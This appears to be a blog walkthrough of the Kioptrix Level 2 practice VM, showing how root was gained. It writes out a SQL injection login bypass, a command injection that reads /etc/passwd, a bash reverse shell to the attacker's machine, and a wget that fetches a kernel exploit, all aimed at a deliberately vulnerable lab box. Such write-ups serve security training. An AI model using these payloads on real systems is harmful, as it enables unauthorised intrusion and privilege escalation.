[Hacking series] – Kioptrix level 2

Written by  on June 6, 2015 

Code name: Kioptrix2

Webpage: http://kioptrix.com/

VM Download: http://www.kioptrix.com/blog/dlvm/Kioptrix_Level_2.rar

Challange: Get root on the system

After booting the box we can find it with netdiscover and scan it with nmap

# nmap -Pn -A -p- 192.168.11.13

nmap scan gave us the following

0.0

Open ports: 22, 80, 111, 443, 631, 778, 3306

In these boxes port 80 is always an interesting port, let’s see what’s hidding.

0.1

It’s a web html-php based login form. We tried a few sql injection strings and methods to bypass the login, and we got this one working on the Username field

Administrator’ or 1=1 #

0.2

Then we moved to a “pingit” style page

0.3

It looks like we can use this page to perform a ping on some IP on the network. How will php do that? Will it use a php function like shell_exec()? Let’s see if we can inject something into that

127.0.0.1; cat /etc/passwd

0.4

Nice, after that, we can try to inject a reverse shell command. As netcat doesn’t seems to be in the system, we can try to use bash itself

On our kali Box:

#nc -lvp 9922

On the command form:

127.0.0.1;bash -i >& /dev/tcp/192.168.11.5/9922 0>&1

0.5

We are in. Next step is to exploit the box. As the system seems to be outdated, we will try to exploit the kernel

# uname -a

kernel

After a quick research, we found that on the exploit database: https://www.exploit-db.com/exploits/9542/

We can compile the exploit on our kali box, then send it to the target box via http (wget)

1

# wget http://192.168.11.5/ring0

And after running that…

2

Game over kioptrix2 P-)

 

Category : hacking series

Leave a Reply

Your email address will not be published. Required fields are marked *